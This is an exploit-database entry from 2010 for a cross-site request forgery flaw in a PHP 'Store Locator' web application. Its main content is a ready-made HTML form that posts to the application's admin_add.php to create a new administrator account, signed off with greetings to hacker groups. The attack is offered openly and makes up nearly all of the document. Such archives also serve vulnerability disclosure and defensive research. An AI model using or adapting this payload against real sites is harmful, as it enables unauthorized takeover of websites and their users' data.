Store Locator Remote Add Admin Exploit CSRF Vulnerability

2010-06-10T00:00:00
ID EDB-ID:13813
Type exploitdb
Reporter JaMbA
Modified 2010-06-10T00:00:00

Description

Store Locator Remote Add Admin Exploit CSRF Vulnerability. Webapps exploit for php platform

                                        
                                            # vendor: www.ghostscripter.com
::::::::::::::[explo!t]:::::::
:::::::


<html>
<head>
<title> Store Locator Remote Add Admin Exploit  </title>
</head>
<body text="#00FF00" bgcolor="#000000">
<form action=http://server/StoreLocator/adm/admin_add.php method=post
style="text-align: center">
<br>
User: <input name="username" type="text" id="username" value="" />
<br>
Pass: <input name="password" type="password" id="password" value=""  />
<br>
<input type="submit" name="Submit" value="Create Admin" /><br>
 <br>
</p>
</form>
</body>
<html>

::::::::::::::::::::::::::::::::::::::::::
Greetz to : Alnjm33-virus-pal - Predator-bingo2 - xXx-jago-dz
-inejcteur-4PY-SaYrOs- XR57 -Tr0y-x Ahmadso -alsaek
AnD all Tunisian hacker

:::::::::::::::::::S.W.T:::::::::::::::::::::